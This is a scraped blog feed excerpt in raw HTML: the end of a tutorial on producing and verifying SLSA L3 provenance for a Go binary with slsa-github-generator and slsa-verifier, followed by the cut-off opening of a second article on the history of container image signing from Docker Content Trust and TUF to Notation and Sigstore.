&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="s"&gt;"fmt"&lt;/span&gt;
    &lt;span class="s"&gt;"runtime"&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="n"&gt;Version&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1.0"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;fmt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"hello-slsa %s (%s/%s)&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Version&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GOOS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;runtime&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GOARCH&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;go.mod&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;module github.com/0-draft/hello-slsa

go 1.26
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;code&gt;.slsa-goreleaser.yml&lt;/code&gt;: the builder's configuration
&lt;/h3&gt;

&lt;p&gt;The slsa-github-generator Go builder reads its own &lt;code&gt;goreleaser&lt;/code&gt;-style YAML (similar in shape, not interchangeable). Nothing fancy.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1&lt;/span&gt;

&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;GO111MODULE=on&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;CGO_ENABLED=0&lt;/span&gt;

&lt;span class="na"&gt;flags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;-trimpath&lt;/span&gt;

&lt;span class="na"&gt;ldflags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-X&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;main.Version={{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;.Env.VERSION&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}"&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-s&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;-w"&lt;/span&gt;

&lt;span class="na"&gt;goos&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;linux&lt;/span&gt;
&lt;span class="na"&gt;goarch&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;amd64&lt;/span&gt;

&lt;span class="na"&gt;binary&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hello-slsa-{{ .Os }}-{{ .Arch }}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;-trimpath&lt;/code&gt; and &lt;code&gt;CGO_ENABLED=0&lt;/code&gt; are reproducibility incantations. The next post on Reproducible Builds digs into why these matter.&lt;/p&gt;
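&lt;p&gt;The claim is easy to spot-check locally: build the same source twice with those flags and compare digests. A sketch, assuming a Go toolchain and the hello-slsa sources in the current directory:&lt;/p&gt;

```shell
# Two clean builds of the same source should produce byte-identical binaries.
CGO_ENABLED=0 go build -trimpath -o build-a .
CGO_ENABLED=0 go build -trimpath -o build-b .

sha256sum build-a build-b   # identical digests if the build is reproducible
```

&lt;p&gt;(On macOS, use &lt;code&gt;shasum -a 256&lt;/code&gt;.)&lt;/p&gt;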

&lt;h3&gt;
  
  
  &lt;code&gt;.github/workflows/release.yml&lt;/code&gt;: the caller
&lt;/h3&gt;

&lt;p&gt;This is the heart of it. &lt;code&gt;uses:&lt;/code&gt; calls the slsa-github-generator reusable workflow.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Release with SLSA L3 Provenance&lt;/span&gt;

&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;v*"&lt;/span&gt;

&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read-all&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# required to mint OIDC tokens&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# required to upload assets to the GitHub Release&lt;/span&gt;
      &lt;span class="na"&gt;actions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;      &lt;span class="c1"&gt;# required to read workflow run metadata&lt;/span&gt;
    &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml@v2.1.0&lt;/span&gt;
    &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;go-version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1.26"&lt;/span&gt;
      &lt;span class="na"&gt;config-file&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;.slsa-goreleaser.yml&lt;/span&gt;
      &lt;span class="na"&gt;evaluated-envs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;VERSION:${{&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;github.ref_name&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;}}"&lt;/span&gt;
      &lt;span class="na"&gt;upload-assets&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

  &lt;span class="na"&gt;verify&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;build&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;slsa-framework/slsa-verifier/actions/installer@v2.7.1&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/download-artifact@v8&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ needs.build.outputs.go-binary-name }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/download-artifact@v8&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ needs.build.outputs.go-provenance-name }}&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;slsa-verifier verify-artifact \&lt;/span&gt;
            &lt;span class="s"&gt;"${{ needs.build.outputs.go-binary-name }}" \&lt;/span&gt;
            &lt;span class="s"&gt;--provenance-path "${{ needs.build.outputs.go-provenance-name }}" \&lt;/span&gt;
            &lt;span class="s"&gt;--source-uri "github.com/${{ github.repository }}" \&lt;/span&gt;
            &lt;span class="s"&gt;--source-tag "${{ github.ref_name }}"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;About the permissions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;id-token: write&lt;/code&gt;&lt;/strong&gt;: lets GitHub mint an OIDC ID token. That token is exchanged at Fulcio for a short-lived certificate, whose key is used to sign the provenance.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;contents: write&lt;/code&gt;&lt;/strong&gt;: needed when &lt;code&gt;upload-assets: true&lt;/code&gt; to upload Release assets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;actions: read&lt;/code&gt;&lt;/strong&gt;: needed to read the workflow's own metadata (run id, sha, ref).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;What happens when this fires:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F30wohvqod71ge5njlknx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F30wohvqod71ge5njlknx.png" alt="Github Workflow" width="800" height="559"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;build&lt;/code&gt; job only compiles the user's code; it never participates in assembling or signing the provenance. Because &lt;code&gt;builder_go_slsa3.yml&lt;/code&gt; runs as a &lt;strong&gt;separate workflow&lt;/strong&gt;, no matter how dirty your user code is, it cannot reach the signing key. That's the L3 separation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Local check
&lt;/h3&gt;

&lt;p&gt;Before pushing the tag, run the build locally to see it work.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/0-draft/hello-slsa
&lt;span class="nb"&gt;cd &lt;/span&gt;hello-slsa

go build &lt;span class="nt"&gt;-trimpath&lt;/span&gt; &lt;span class="nt"&gt;-ldflags&lt;/span&gt; &lt;span class="s2"&gt;"-s -w"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; hello-slsa &lt;span class="nb"&gt;.&lt;/span&gt;
./hello-slsa
&lt;span class="c"&gt;# hello-slsa 0.1.0 (darwin/arm64)&lt;/span&gt;

shasum &lt;span class="nt"&gt;-a&lt;/span&gt; 256 hello-slsa
&lt;span class="c"&gt;# 3258c85472175bdbfe0ef450402265ca118ed0c97a1ab4e8b96b5704e2f9a1d6  hello-slsa&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When the same build runs in CI, the SHA256 of the CI-built binary is what ends up in &lt;code&gt;subject.digest.sha256&lt;/code&gt; of the provenance, and &lt;code&gt;.intoto.jsonl&lt;/code&gt; is uploaded alongside the binary. Your local hash will usually differ (different OS and toolchain); what matters is that the digest recorded in the provenance subject matches the binary CI actually released.&lt;/p&gt;
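&lt;p&gt;The provenance file itself is a DSSE envelope whose &lt;code&gt;payload&lt;/code&gt; field is base64-encoded JSON. A minimal sketch of pulling the subject digest out with &lt;code&gt;jq&lt;/code&gt;; the envelope below is a hand-written stand-in with a made-up digest, since the real &lt;code&gt;.intoto.jsonl&lt;/code&gt; comes from the CI run:&lt;/p&gt;

```shell
# Build a tiny synthetic DSSE envelope standing in for the real
# .intoto.jsonl downloaded from the release (same shape, fake digest).
payload=$(printf '%s' '{"subject":[{"name":"hello-slsa","digest":{"sha256":"c0ffee11c0ffee11c0ffee11c0ffee11c0ffee11c0ffee11c0ffee11c0ffee11"}}]}' | base64 | tr -d '\n')
printf '{"payloadType":"application/vnd.in-toto+json","payload":"%s"}\n' "$payload" > provenance.intoto.jsonl

# The payload is base64-encoded JSON: decode it, then read the subject digest.
jq -r '.payload' provenance.intoto.jsonl | base64 -d | jq -r '.subject[0].digest.sha256'
# Compare that value against `shasum -a 256` of the downloaded binary.
```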

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;id-token: write&lt;/code&gt; requires OIDC to be enabled on the repo. On github.com it is on by default; on GitHub Enterprise Server you have to configure it separately.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  3. What can the verifier actually trust?
&lt;/h2&gt;

&lt;p&gt;That covers the producer side. Back on the consumer side, what does &lt;code&gt;slsa-verifier verify-artifact&lt;/code&gt; actually confirm?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyvomhcgow66jod3j90gp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyvomhcgow66jod3j90gp.png" alt="Actually Trust" width="800" height="130"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it can do&lt;/strong&gt;: cryptographically prove "the binary at tag v2.7.1 really did come out of the legitimate GitHub Actions builder." SUNSPOT-style attacks (tampering during the build) and Codecov-style attacks (uploading without going through the build) stop here.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What it cannot do&lt;/strong&gt;: if the source itself contains malicious changes, the provenance faithfully signs "we correctly took this malicious code as input." That needs a different layer: SLSA Source Track, four-eyes review, and so on.&lt;/p&gt;

&lt;p&gt;In other words, provenance is the layer that detects build-path tampering but cannot detect human malice. Combine it with SBOM (transparency about contents) and Cosign (identity of the author), and only then do you get layered defense.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. Layering SBOM + Cosign + Provenance
&lt;/h2&gt;

&lt;p&gt;Final picture: lay all three side by side.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What it proves&lt;/th&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;predicateType&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Ingredients (contents)&lt;/td&gt;
&lt;td&gt;Syft + cosign attest&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://cyclonedx.org/bom&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Identity (author)&lt;/td&gt;
&lt;td&gt;cosign sign&lt;/td&gt;
&lt;td&gt;(the signature itself, not a Statement)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build path&lt;/td&gt;
&lt;td&gt;slsa-github-generator&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://slsa.dev/provenance/v1&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr3luf33zccb66nlzno2h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fr3luf33zccb66nlzno2h.png" alt="SBOM and Cosign and Provenance" width="800" height="230"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once "build path + contents + author" are all in place, the artifact has all-around evidence. If the Kubernetes admission layer can enforce &lt;code&gt;reject unless provenance, SBOM, and signature are all present&lt;/code&gt;, the operator's trust boundary firms up considerably.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap-up
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;What we did&lt;/th&gt;
&lt;th&gt;What we learned&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Verified a public artifact with &lt;code&gt;slsa-verifier&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;How to verify provenance without holding any keys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mutated a single byte and watched verification fail&lt;/td&gt;
&lt;td&gt;The point at which SUNSPOT-style attacks die&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Opened &lt;code&gt;.intoto.jsonl&lt;/code&gt; with &lt;code&gt;jq&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;What is actually recorded inside the provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Wrote a &lt;code&gt;slsa-github-generator&lt;/code&gt; workflow&lt;/td&gt;
&lt;td&gt;The "way to call in" that satisfies L3&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Provenance, unlike SBOM or Cosign, isn't something you can produce locally with a one-shot CLI. &lt;strong&gt;The builder itself has to be running in a place you trust&lt;/strong&gt;, which is why something like a GitHub Actions reusable workflow (with its structural separation) is non-negotiable. The flip side: if you have that environment, a single line of &lt;code&gt;uses:&lt;/code&gt; carries you all the way to L3.&lt;/p&gt;

&lt;p&gt;The next post moves to the operational headache that always shows up once SBOMs hit production: &lt;strong&gt;"the vulnerability scanner threw 800 warnings, but only 5 are actually exploitable."&lt;/strong&gt; We pin that down with VEX. Where provenance is "authenticity of the build path", VEX is "authenticity of vulnerability triage."&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://github.com/0-draft/hello-slsa" rel="noopener noreferrer"&gt;0-draft/hello-slsa&lt;/a&gt; (the hands-on repo for this article)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-github-generator" rel="noopener noreferrer"&gt;slsa-framework/slsa-github-generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/slsa-framework/slsa-verifier" rel="noopener noreferrer"&gt;slsa-framework/slsa-verifier&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://slsa.dev/spec/v1.0/provenance" rel="noopener noreferrer"&gt;SLSA v1.0 Provenance spec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/in-toto/attestation" rel="noopener noreferrer"&gt;in-toto Attestation Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/secure-systems-lab/dsse" rel="noopener noreferrer"&gt;DSSE (Dead Simple Signing Envelope)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>security</category>
      <category>supplychain</category>
      <category>slsa</category>
      <category>sigstore</category>
    </item>
    <item>
      <title>Why Did Docker Abandon TUF?: A Turbulent History of Container Signing</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Tue, 28 Apr 2026 11:34:24 +0000</pubDate>
      <link>https://dev.to/kanywst/why-did-docker-abandon-tuf-a-turbulent-history-of-container-signing-29i4</link>
      <guid>https://dev.to/kanywst/why-did-docker-abandon-tuf-a-turbulent-history-of-container-signing-29i4</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

&lt;p&gt;While doing a deep dive on Sigstore and TUF, a question hit me out of nowhere.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;"OK, but how exactly are container images protected from tampering?"&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you understand TUF, you'd guess: "You write the container image hash into &lt;code&gt;targets.json&lt;/code&gt;, sign it with an offline key, done." And in 2015, that's exactly how it worked.&lt;/p&gt;

&lt;p&gt;But today, that mental model is &lt;strong&gt;completely outdated&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The container signing architecture in the Docker world has gone through a turbulent decade: &lt;strong&gt;"They tried to do it the TUF way, developers refused to play along, the whole thing imploded, and the industry pivoted to a totally different approach."&lt;/strong&gt; And that "different approach" turned out to be &lt;strong&gt;two competing approaches&lt;/strong&gt; released around the same time, both fighting for dominance. Trying to keep up with this is exhausting.&lt;/p&gt;




&lt;h2&gt;
  
  
  Background: What "Signing a Container Image" Actually Means
&lt;/h2&gt;

&lt;p&gt;Before diving into history, we need to nail down what "signing a container image" actually does. If this is fuzzy, the rest of the story will be too.&lt;/p&gt;

&lt;h3&gt;
  
  
  Structure of a Container Image
&lt;/h3&gt;

&lt;p&gt;A container image is not just a tar file. A JSON file called the &lt;strong&gt;Manifest&lt;/strong&gt; holds the &lt;strong&gt;hashes (digests)&lt;/strong&gt; of each layer (filesystem diff) and config file that make up the image.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌───────────────────────────────────────┐
│  Image Manifest (JSON)                │
│                                       │
│   config:  sha256:abc123...           │
│   layers:                             │
│     - sha256:def456... (base OS)      │
│     - sha256:789ghi... (app code)     │
│                                       │
│  ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─│
│  Manifest's own Digest:               │
│    sha256:xxxxxx...                   │
│  → This is the "image fingerprint"    │
└───────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If even 1 bit of the image content changes, the Manifest's Digest changes completely. &lt;strong&gt;If we can guarantee just this Digest is correct, we can detect any tampering of the entire image.&lt;/strong&gt;&lt;/p&gt;
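&lt;p&gt;That avalanche property is easy to demonstrate locally with nothing but &lt;code&gt;sha256sum&lt;/code&gt;; the sketch below uses plain files standing in for a layer and its manifest:&lt;/p&gt;

```shell
# A fake "layer" and a manifest that records its digest,
# standing in for the real OCI structures.
printf 'FROM scratch\n' > layer.tar
layer_digest=$(sha256sum layer.tar | cut -d' ' -f1)
printf '{"layers":[{"digest":"sha256:%s"}]}' "$layer_digest" > manifest.json
sha256sum manifest.json | cut -d' ' -f1   # the image "fingerprint"

# Flip a single character in the layer and rebuild:
# every digest above it changes completely.
printf 'FROM scratcH\n' > layer.tar
layer_digest=$(sha256sum layer.tar | cut -d' ' -f1)
printf '{"layers":[{"digest":"sha256:%s"}]}' "$layer_digest" > manifest.json
sha256sum manifest.json | cut -d' ' -f1   # a totally different value
```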

&lt;h3&gt;
  
  
  "Signing" = Detached signature on the Digest
&lt;/h3&gt;

&lt;p&gt;The intuitive idea is "embed the signature data inside the image," but that's impossible. If you change the image to insert a signature, the Digest changes, and the signature becomes invalid. Chicken-and-egg problem.&lt;/p&gt;

&lt;p&gt;So container signatures are always &lt;strong&gt;Detached Signatures&lt;/strong&gt;. Sign the Manifest's Digest from outside, and store the signature &lt;strong&gt;somewhere separate&lt;/strong&gt; from the image itself.&lt;/p&gt;

&lt;p&gt;So where is "somewhere separate"? &lt;strong&gt;This is the question that has been violently re-litigated for ten years.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Timeline: A Decade of Container Signing
&lt;/h2&gt;

&lt;p&gt;Let's lay out the full picture first. Each entry will be expanded in later sections.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2015.08&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Docker Content Trust (DCT) released with Docker Engine 1.8. Notary v1, running underneath, is a pure TUF implementation. Signatures stored on a &lt;strong&gt;separate Notary server, not the registry&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2017.10&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CNCF accepts Notary and TUF as Incubating projects.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2019.11&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Notary v2 discussions kick off at KubeCon NA (San Diego). The following month, a kickoff meeting is held at Amazon's Seattle office with Docker, Microsoft, Amazon, Google, Red Hat, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2021.06&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Sigstore holds its first Root Key Ceremony (6/18). TUF is used only for "distributing root certificates."&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2023.08&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Notary v2 (Notation) v1.0.0 released (8/15). &lt;strong&gt;TUF completely dropped.&lt;/strong&gt; Same month, Harbor 2.9.0 &lt;strong&gt;fully removes Notary v1&lt;/strong&gt; (deprecation began in 2.6.0).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2024.02&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;OCI Image/Distribution Specification v1.1.0 officially released. &lt;strong&gt;Referrers API&lt;/strong&gt; standardized, formalizing in-registry signature storage.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2025.03&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Azure Container Registry begins DCT deprecation (full removal scheduled for 2028.03).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;2025.08&lt;/strong&gt;&lt;/td&gt;
